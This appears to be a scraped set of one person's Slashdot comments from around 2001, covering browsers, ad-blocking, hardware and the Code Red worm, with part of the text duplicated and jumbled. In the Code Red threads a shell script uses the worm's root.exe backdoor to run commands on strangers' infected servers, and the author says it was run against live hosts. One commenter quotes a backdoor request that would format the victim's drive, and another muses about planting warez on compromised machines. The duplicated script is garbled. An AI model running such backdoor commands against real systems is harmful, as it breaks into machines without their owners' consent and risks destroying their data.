If the SSH client generates a tinygram for each character entered in the password, it would seem a simpler fix would be to buffer the entire password and only send it once the user hits Enter/Return/whatever. Instead of x tinygrams for an x-character password (more if you need to fix a typo), you would have just one with the entire password. Making all packets with passwords the same size (fill the dead space with noise) ought to help. You still can't do much to protect keystrokes once the session is going...using vi/emacs/trn/etc. in line-buffered mode would suck. Still, it would make passwords a little more secure.
(Then again, the above could be completely off-base...I do graphics software, not security software.:-) )
i am quite tired of some of the people on this site who are quick to criticize slashdot for having downtime. I am willing to bet these same people probably have not had to face a pissed off boss and manager breathing down your kneck while trying to revive a mission critical server that is "not supposed to fail".
And these same people probably don't realize that halph your down time is for describing to your boss why some , very expensive mind you, servers that are "not supposed to fail" are in pieces on the floor.
They're probably the same schmucks who wouldn't sign off on the backup software, the preventive-maintenance items, or whatever that would've prevented the downtime in the first place. Been there, done that. In most places, they're called "bean counters."
I know a few people who are running non-infected Web Servers and they're still getting a fair amount of traffic related to the Code Red (and variants) virus.
5877 attempts logged from 2140 hosts as of now. 129 of them are from today. It's tapered off, and a greater proportion is from other service providers, but it's still coming in. My server auto-responds to each attack attempt with a popup on the remote console.
from the parent:
This proves once again, that there still isn't a good browser for Linux. So we have to decide
on which one is less crappy, and not which one is better.
Where on earth did you get that from? It wasn't from anything I posted. Put down the crack pipe, pay attention, and get your quotes straight before you post and make a fool of yourself.
(BTW, just did a check...it was two levels before my post. It's also currently scored 5, Insightful...that doesn't happen to troll posts.)
That's a troll.
Sounds more like an opinion with which you disagree...that doesn't make it a troll. In any case, it wasn't what I wrote. If you're responding to me (and/. says you are), I'd appreciate it if you didn't put words in my mouth. (FWIW, back when I was running Linux on the desktop (about a year ago), I had VMware running Win98 so that I could run IE...because there were no decent graphical browsers for Linux at the time. That may very well have changed; I have no recent experience with which to confirm or deny that.)
It's just as wrong as all these MSIE is great posts by the other Micro Terds around here.
That's nice...ever hear of using the right tool for the job? Stuff like this would make me embarrassed that I use Linux for anything...if I paid any heed to the zealots on either side.
This is a Linux news site, please refrain from singing MSIE praises all day long, as a quick review of your user page indicates you do.
<flame>
Pull your head out of your ass...where on this page did you get that idea? Besides, I thought/.'s banner was "news for nerds; stuff that matters." I guess all those articles on DMCA atrocities and Star Wars and *BSD and such don't belong here, if we're to believe you. Now would you just either get a clue or FOAD? </flame>
Learn the definition of "troll" before you start slinging that label around. Just because you can't figure out how to get NT and/or IE to run reliably doesn't make someone who can a troll. (It's really not that difficult...start with a clean, vanilla install, apply SP3, install IE 5.5 to replace the IE 2.x that comes with NT, and apply SP6a. Or something like that...it's been a while since I've needed to reinstall NT on a box.)
Besides, in what way does a positive comment on IE under Windows reflect negatively on Linux? Did I say anything against Linux? The last time I checked (which was several months ago), FWIW, Konqueror was getting to where it would be usable. I think the only page on which it choked was MSN, which is (somewhat) understandable. Maybe that's been fixed since then; I don't have a system right now on which I can check it. If I need to browse within Linux, I normally use Lynx, but that's because I run Linux headless on a server (no X). As for Nutscrape, it's caused me no end of grief as a website developer (its level of support for HTML and CSS is horribly behind the times) and I've heard more than a few complaints of crashes under multiple OSen. I won't let it come anywhere near any of my computers...whether they run Windows, MacOS, Linux, BSD, or whatever (yes, I have systems running all of those).
IE more stable ? since i use Mozilla 0.9.3 it hasnt yet crashed, but IE 5.5 crashes nearly everyday on my work where i use WinNT4. (nothin a simple kill and restart doesnt fix)
Something must be seriously ate-up with your system if IE is causing problems like that. I run IE 5.5 on Win2K Pro SP2 and it Just Doesn't Crash.
If you want to argue that this software is not being consented to...
That's a big part of what this discussion is about (that, and replacing one ad with another, which is what Madison Avenue ought to get hot and bothered about).
Oh, and one more thing:
It's unethical to block ads. Don't like them? Don't visit sites that use them. Else, you are stealing.
Let me guess...you never hit fast-forward or mute when an ad comes up on TV. If you do, then please explain how running an ad filter is any different.
Are you saying, then, that you have no problem with "hijackware" that is surreptitiously (read that as "without your knowledge or consent") installed on your computer and works behind the scenes to alter the appearance (and possibly the functionality) of a website? I set up Squid to block ads from most third-party sources (if a site serves up its own ads, I usually don't bother adding it to the list unless it's really annoying). I know it's doing that because I set it up to do that.
That is exactly what fair use is all about.
What a load of bull. From what part of the fair-use doctrine do you get the idea that hijackware is in any way legitimate? The last time I checked, the fair-use doctrine allows you to excerpt copyrighted materials for educational or critical purposes, and to make full copies for backup purposes (as with software) or to enable usage of copyrighted material in a different device (as in copying a CD to tape or ripping it to MP3 for playback in your car's tape deck or your MP3 player). Parody is also generally protected, and editing for personal use (as in doing your own remix) is accepted...but these are actions that you undertake of your own free will. Please explain, for the edification of all/.ers, how hijackware fits into fair use.
As for your sig WRT ad-blocking...if I didn't have to worry about third parties following my every click, maybe I'd consider shutting down Squid. When I go to fubar.com, I've consented for fubar.com to send content (including potentially harmful scripts) to my computer. That consent doesn't extend to DoubleClick, Aureate, or other third parties (note the previous remark about usually not blocking ads served up by a website's server...if fubar.com has its own banner, it'll usually get through). Also, what about the people who use Lynx...do you consider them to be without scruples because their browser will never display that inane "punch the monkey" banner?
Yeah right. Its like that crap RealPlayer. When I installed it, it specifically had options for whether or not you want RealPlayer to run on startup and sit in the taskbar. I *made sure* that this option was not selected. It completely ignores the option, it runs on startup anyway and sits in the taskbar.
You think that's bad? An older version installed AIM on my computer once. I don't want any of AOHell's crap on my computer. I don't use Nutscrape. I don't use AIM or ICQ (or any other messaging system, for that matter...last time I used IRC was probably a decade ago). I don't use Winamp anymore (tho' it was pretty cool before Nullsoft got swallowed up). I fired off a nastygram to Real about it, and it seems that it's not in current versions (at least not in the basic download that's available).
Unfortunately, it seems like this is going to come up again and again. The best solution I can think of is a HTML meta tag or HTTP header like "HTTP-Dont-Fuck-With: yes".
Microsoft already has something similar for its smart tags:
I have this in the template for my website, so it appears on all my pages. I also just added in this little blurb to go along with the copyright notice at the bottom:
This is an ad-free website. If advertising material appears on any page in this website, it indicates that you have software installed on your computer (probably without your knowledge) that is inserting the ads. Such defacement is a violation of copyright, and I'd appreciate it if you'd contact me [there's an email link here] so that we can figure out what software is interfering with your browsing experience and so that I can go after the company that's responsible for this defacement.
You might consider something similar for your own websites, especially if yours is ad-free by design (one of the joys of hosting your site on your own server on a cable-modem connection:-) ).
(The first result is one of my pages. I made the rounds of several search engines a little while ago to check the page ranking. Yahoo is using Google's search results more or less unmodified.)
I own Radeon 64 and I am yet to see single ATI related crash ( running on Widows 2000)
Likewise...I'm running a Radeon 32MB DDR under Win2K, and I had an Xpert 98 (Rage Pro) before that which got used with Win98 and Linux (including XFree86). I've never had driver problems with any of them. Rage 128-based cards that I installed in other people's computers had some driver issues early on, but those have since been fixed.
Probably the only cards I've run across that consistently would not run reliably in anything were 3Dfx Voodoo Banshees (hell, I think you couldn't even get past the install without the damn thing locking up), and those (and the company that made them) are long gone.
Not just via motherboards -- unfortunately, anything with an AMD760 chipset too.:(
My understanding was that the latest versions of Linux and XFree86 were supposed to be able to run the Radeon on a 760 in more than just plain-vanilla VGA mode. I could be wrong, though...haven't tried it lately as I mostly run Win2K on that box.
I would also add a *BSD in the mix, if the original poster can try different distros.
Definitely not a bad idea to get something different in there. After finding that the most recent Debian ran unacceptably slow on my Quadra 610 (I don't remember Linux running that slow back when I was running it on a 486SLC-33, which is closest to this Mac in speed), I snagged a NetBSD ISO, burned it, and installed it (actually, it's still installing now...the hard drive is thrashing like crazy). For non-x86 platforms especially, NetBSD appears to have better hardware support. (Linux doesn't support sound, AppleTalk, or the IWM/SWIM floppy controllers in most Macs. I'm fairly sure NetBSD supports the sound and floppy controller...haven't looked much into AppleTalk yet.)
If you want to stick with Linux, you can't go wrong with SuSE. I've thrown it on several systems; it gets going without much fuss and has nearly everything you could want precompiled for it (it's an "everything including the kitchen sink" distro). Way back in the day, I used Slackware; it was a solid enough system, but I'm not sure it has the ease of installation or use that a raw beginner will want. (I had a few years' experience with other UN*X boxen before I picked up Linux back in '93 or so.)
(My personal favorite is LinuxFromScratch, but that's definitely not for greenhorns.:-) )
There's a rebuttal list to this comment made by the head of some automotive company.
It was GM. I don't think the list is on their site (but then I didn't go looking for it there), but Google came up with a few hits. This is a list of things with which to finish the phrase "If Microsoft built cars..." This is a hypothetical "GM helpdesk" taking lusers' questions as if cars were like computers (someone ought to do a BOFH version of this).
My first run-in with a NeXTcube was, if I recall the hostname correctly, mrcnext.cso.uiuc.edu (IP address reported as 128.174.68.206, but it isn't currently responding to ping...don't know if it's just shut off or if it's been decommissioned) back in 1989 or '90. In addition to the usual NeXT coolness, you could telnet into it and do the usual shell stuff with no time limits. uxa, the main student machine, had a 7-hour-per-week limit which I (and many of the people I knew) usually ran up against on Thursday or Friday (if not earlier). Having unlimited access (in terms of time...they didn't give us root) to mrcnext fixed that problem. (You could also stay logged into uxa past the seven-hour limit, but you were screwed if line noise killed your connection to the terminal server.)
Of course, getting in lots of time on the computers was probably the main reason my spring-semester grades weren't so hot...:-|
I should probably mention that if (like me) you're logging Apache traffic to MySQL with apachedb, you'll probably need to change the query to whatever requestid corresponds to/default.ida on your system. Going into MySQL and doing something like this:
use apache2
select id from request where request="/default.ida";
ought to work to get that info. Then again, if you're using apachedb, you've probably figured it out already, and I'm stupid for not having put this in the original post in any case.:-)
maybe you should send it to more than just local host... you'd have to check on a windows box, but I think "net send/domain the server at $ip is infected by code red
I threw IIS onto my Win2K box (it sits behind a Linux firewall and only does workstation stuff) to play with different usernames. I considered sending to Administrator, but if nobody is logged in as an admin, nobody will see the message. Also, some shops change "Administrator" to something else, in which case sending to that name will fail altogether. (I'll allow that someone with the minimal clue needed to rename the admin account probably knows well enough to keep up on patches and updates, so this might not be a common occurrence.) Your suggestion to send to/domain only works if domain-based security is in use (presumably either the domain security in NT 4 or ActiveDirectory in Win2K). Most of the shops that are having problems with CodeRed probably don't know how to set up and manage domains.
Sending the popup to localhost, OTOH, makes reasonably sure the message gets to the server. It could be a problem if the server is stuck in a corner somewhere and nobody ever fires it up to check on it periodically.
I let the script loose this afternoon. For some reason, it only got to 229 hosts before conking out. (My CodeRed log page lists "3689 attempts logged from 1419 hosts" as of this writing. 2142 of those are from other lvcm.com customers.) Of those, it said 172 were down. Of the 57 that were up, 22 appear to have been fixed (Lynx came back with an error, probably because root.exe is gone from the CGI directory). 35 were still infected. 35 of 57...that's three out of five machines still opened wider than the goatse.cx guy, even after a week and a half.
(Posted without the +1 bonus because it's not entirely on-topic.)
I'll say "Intel sucks, RDRAM bites, DDR rocks and AMD RULES!" Go READ the datasheets for the P4 and the Athlon and come back and tell me which is better. But if you can't understand those datasheets, shut up, you're not entitled to an opinion. Hersay does NOT count!
Um...between the above and the subject line you're using, I hope you didn't get the impression that I am some sort of Intel fanboy. Reread my post...it was a description of a certain Induhvidual who pestered a group on Usenet for several months. I've bought only AMD for the past four years or so, starting with a K6-200 and going up to a 1.0-GHz Athlon.
The folks on the Rambus board at The Motley Fool's message boards (www.fool.com) are positively frightening in their zealotry...
Not just the Fool...Yahoo is home to some foaming-at-the-mouth RMBS fanboys as well. Up until Rambus started losing in court, one of them also infested comp.sys.ibm.pc.hardware.chips. Never mind the demonstrated inferior performance of RDRAM in most applications and with most processors and chipsets; to this maroon, RDRAM and the P4 were the Second Coming while DDR SDRAM and the Athlon were "unstable dead-end junk" and "dead dead dead." Never mind that the Athlons I use at home and at work (a homebrew box at home and an HP Pavilion (!) at work) are among the fastest, most stable computers I've ever used...if you disagreed, you must've been an "AMDroid."
(None of this even gets into comp.sys.ibm.pc.hardware.chips as a technical newsgroup for discussing the merits of different processors, chipsets, etc., as opposed to a stock board...)
Re:Follow-up viruses?
on
Code Red III
·
· Score: 2
What's to keep someone from writing something that exploits this, looking for boxes that have been patched, and removing the patch - re-enabling the vulnerability to CR? Or surreptitiously opening additonal services? Or hell, simply executing del (is that the command in DOS?) c:\?
NT and Win2K aren't DOS, but DEL is in there. DELTREE is also in NT IIRC, but it isn't in Win2K (not that it'd be hard to copy over Win98's DELTREE and use that).
An infected server sounds like the ideal place to throw up a warez/pr0n/mp3z site on someone else's nickel...use ftp.exe to fetch a batch file that then builds a directory structure and pulls the files (or "filez," since it's that kind of site) over. If they're too stupid to have patched against CodeRed2, they're probably too stupid to check their logs to find out why their available bandwidth has apparently shrunk to nothing. It'd be an interesting idea to try out, if I had no sense of moral inhibition and/or didn't think I'd get caught.:-)
Besides, if it's the site of a company you don't particularly like, imagine what would happen if the SPA or BSA came knocking and found Office XP ISOs available for download at http://www.fubared-company.com/warez...
Re:More information?
on
Code Red III
·
· Score: 5, Informative
Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.
Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.
That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.
I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.
Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:
#!/bin/sh
http_proxy=
for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
do
echo -n Sending Code Red message to $i...
result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
if [ -n "$result" ]
then
ec ho host is down.
else
ly nx -dump http://$i/scripts/root.exe\?/c+net+send+localhost+ %22Your+w\
eb server+has+been+infected+with+the+CodeRed2+worm.+Y ou+have+a+security\
+h ole+so+big+that+you+can+drive+a+Mack+truck+through +it.+You+should+fi\
x+ it+before+some+script+kiddie+comes+along+and+takes +advantage+of+it.+\
+R emove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cs cripts+\(or+wherev\
er +your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscri pts+is+the+default\
+l ocation\).%22 >/dev/null
ec ho message sent.
fi
done
Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.
(Then again, the above could be completely off-base...I do graphics software, not security software. :-) )
5877 attempts logged from 2140 hosts as of now. 129 of them are from today. It's tapered off, and a greater proportion is from other service providers, but it's still coming in. My server auto-responds to each attack attempt with a popup on the remote console.
(BTW, just did a check...it was two levels before my post. It's also currently scored 5, Insightful...that doesn't happen to troll posts.)
Sounds more like an opinion with which you disagree...that doesn't make it a troll. In any case, it wasn't what I wrote. If you're responding to me (andPull your head out of your ass...where on this page did you get that idea? Besides, I thought
</flame>
Besides, in what way does a positive comment on IE under Windows reflect negatively on Linux? Did I say anything against Linux? The last time I checked (which was several months ago), FWIW, Konqueror was getting to where it would be usable. I think the only page on which it choked was MSN, which is (somewhat) understandable. Maybe that's been fixed since then; I don't have a system right now on which I can check it. If I need to browse within Linux, I normally use Lynx, but that's because I run Linux headless on a server (no X). As for Nutscrape, it's caused me no end of grief as a website developer (its level of support for HTML and CSS is horribly behind the times) and I've heard more than a few complaints of crashes under multiple OSen. I won't let it come anywhere near any of my computers...whether they run Windows, MacOS, Linux, BSD, or whatever (yes, I have systems running all of those).
-
CowboyNeal
(Someone had to put it in...might as well be me.Oh, and one more thing:
Let me guess...you never hit fast-forward or mute when an ad comes up on TV. If you do, then please explain how running an ad filter is any different.As for your sig WRT ad-blocking...if I didn't have to worry about third parties following my every click, maybe I'd consider shutting down Squid. When I go to fubar.com, I've consented for fubar.com to send content (including potentially harmful scripts) to my computer. That consent doesn't extend to DoubleClick, Aureate, or other third parties (note the previous remark about usually not blocking ads served up by a website's server...if fubar.com has its own banner, it'll usually get through). Also, what about the people who use Lynx...do you consider them to be without scruples because their browser will never display that inane "punch the monkey" banner?
You think that's bad? An older version installed AIM on my computer once. I don't want any of AOHell's crap on my computer. I don't use Nutscrape. I don't use AIM or ICQ (or any other messaging system, for that matter...last time I used IRC was probably a decade ago). I don't use Winamp anymore (tho' it was pretty cool before Nullsoft got swallowed up). I fired off a nastygram to Real about it, and it seems that it's not in current versions (at least not in the basic download that's available).
<meta name="MSSmartTagsPreventParsing" content="TRUE">
I have this in the template for my website, so it appears on all my pages. I also just added in this little blurb to go along with the copyright notice at the bottom:
You might consider something similar for your own websites, especially if yours is ad-free by design (one of the joys of hosting your site on your own server on a cable-modem connectionhttp://search.yahoo.com/bin/search?p=Apple+Assembl y+Line
Compare the results to this search submitted to Google:
http://www.google.com/search?sourceid=navclient&q= Apple+Assembly+Line
(The first result is one of my pages. I made the rounds of several search engines a little while ago to check the page ranking. Yahoo is using Google's search results more or less unmodified.)
Probably the only cards I've run across that consistently would not run reliably in anything were 3Dfx Voodoo Banshees (hell, I think you couldn't even get past the install without the damn thing locking up), and those (and the company that made them) are long gone.
If you want to stick with Linux, you can't go wrong with SuSE. I've thrown it on several systems; it gets going without much fuss and has nearly everything you could want precompiled for it (it's an "everything including the kitchen sink" distro). Way back in the day, I used Slackware; it was a solid enough system, but I'm not sure it has the ease of installation or use that a raw beginner will want. (I had a few years' experience with other UN*X boxen before I picked up Linux back in '93 or so.)
(My personal favorite is LinuxFromScratch, but that's definitely not for greenhorns. :-) )
Of course, getting in lots of time on the computers was probably the main reason my spring-semester grades weren't so hot...:-|
use apache2
select id from request where request="/default.ida";
ought to work to get that info. Then again, if you're using apachedb, you've probably figured it out already, and I'm stupid for not having put this in the original post in any case. :-)
Sending the popup to localhost, OTOH, makes reasonably sure the message gets to the server. It could be a problem if the server is stuck in a corner somewhere and nobody ever fires it up to check on it periodically.
I let the script loose this afternoon. For some reason, it only got to 229 hosts before conking out. (My CodeRed log page lists "3689 attempts logged from 1419 hosts" as of this writing. 2142 of those are from other lvcm.com customers.) Of those, it said 172 were down. Of the 57 that were up, 22 appear to have been fixed (Lynx came back with an error, probably because root.exe is gone from the CGI directory). 35 were still infected. 35 of 57...that's three out of five machines still opened wider than the goatse.cx guy, even after a week and a half.
(None of this even gets into comp.sys.ibm.pc.hardware.chips as a technical newsgroup for discussing the merits of different processors, chipsets, etc., as opposed to a stock board...)
An infected server sounds like the ideal place to throw up a warez/pr0n/mp3z site on someone else's nickel...use ftp.exe to fetch a batch file that then builds a directory structure and pulls the files (or "filez," since it's that kind of site) over. If they're too stupid to have patched against CodeRed2, they're probably too stupid to check their logs to find out why their available bandwidth has apparently shrunk to nothing. It'd be an interesting idea to try out, if I had no sense of moral inhibition and/or didn't think I'd get caught. :-)
Besides, if it's the site of a company you don't particularly like, imagine what would happen if the SPA or BSA came knocking and found Office XP ISOs available for download at http://www.fubared-company.com/warez...
I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.
Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:
#!/bin/sh+ %22Your+w\Y ou+have+a+security\h +it.+You+should+fi\s +advantage+of+it.+\s cripts+\(or+wherev\i pts+is+the+default\
http_proxy=
for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
do
echo -n Sending Code Red message to $i...
result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
if [ -n "$result" ]
then
ec ho host is down.
else
ly nx -dump http://$i/scripts/root.exe\?/c+net+send+localhost
eb server+has+been+infected+with+the+CodeRed2+worm.+
+h ole+so+big+that+you+can+drive+a+Mack+truck+throug
x+ it+before+some+script+kiddie+comes+along+and+take
+R emove+root.exe+and+shell.exe+from+c:%5Cinetpub%5C
er +your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscr
+l ocation\).%22 >/dev/null
ec ho message sent.
fi
done
Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.